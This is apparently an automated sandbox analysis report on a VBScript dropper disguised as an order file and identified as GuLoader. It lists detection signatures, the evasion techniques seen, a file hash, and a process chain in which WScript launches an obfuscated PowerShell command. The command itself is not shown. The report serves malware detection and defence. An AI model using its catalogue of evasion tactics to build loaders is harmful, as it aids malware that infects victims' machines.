Windows
Analysis Report
Rendeles nr13252436324563635635464574544545445474.vbs
Overview
General Information
Detection
GuLoader
Score: 92 (range: 0 - 100)
Confidence: 100%
Signatures
Malicious sample detected (through community Yara rule)
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Found suspicious powershell code related to unpacking or dynamic code loading
Joe Sandbox ML detected suspicious sample
Potential malicious VBS script found (suspicious strings)
Queries sensitive service information (via WMI, WIN32_SERVICE, often done to detect sandboxes)
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Wscript starts Powershell (via cmd or directly)
Abnormal high CPU Usage
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number, etc.) of a device
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found; this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match
Classification
- System is w10x64
- wscript.exe (PID: 7912, cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Rendeles nr13252436324563635635464574544545445474.vbs", MD5: A47CBE969EA935BDD3AB568BB126BC80)
  - powershell.exe (PID: 8044, cmdline:
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" followed by a very long obfuscated PowerShell command line)